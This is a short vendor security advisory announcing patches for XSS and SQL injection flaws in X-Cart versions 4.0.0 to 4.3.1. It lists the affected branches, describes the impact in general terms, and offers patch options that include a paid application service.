During internal audit activities we found minor security issues that make X-Cart potentially vulnerable to attackers who wish to gain access to the application back-end.

Qualiteam has released the security update which includes the following improvements.

4.0.x branch:

- protection from XSS attacks has been added (for 4.0.0-4.0.19)
- protection from SQL injection attacks has been improved (for 4.0.0-4.0.18)

4.1.x branch:

- protection from XSS attacks has been added (for 4.1.0-4.1.8).

NOTE: For versions 4.1.9-4.1.10 please apply all the previous security patches

4.2.x and 4.3.x branches (all versions):

- protection from XSS attacks has been improved.

IMPACT

- Malicious users may inject an active content (for instance: JavaScript) into the application to fool users in order to gather data from them. An attacker can steal the session cookie and take over the account, impersonating the user.

- Using certain symbols in URL addresses and SQL queries malicious users can pass SQL commands through a Web application to get hold of sensitive information.

AFFECTED VERSIONS

All X-Cart versions from 4.0.0 to 4.3.1

SOLUTION

We strongly recommend you to apply the security fix to secure your store.

You can:

(1) undertake the patch application yourself (the patch and instructions are available in your Qualiteam helpdesk) or

(2) have us undertake the task for you for $44.00 – simply follow this link – http://www.justxcart.com.au/x-cart/x-cart-security-patch-application-service.html – and once your order is received we will schedule in your security task or

(3) spend technical support points and have Qualiteam/X-Cart assist you.

If you have any questions, please don’t hesitate to contact support@justxcart.com.au.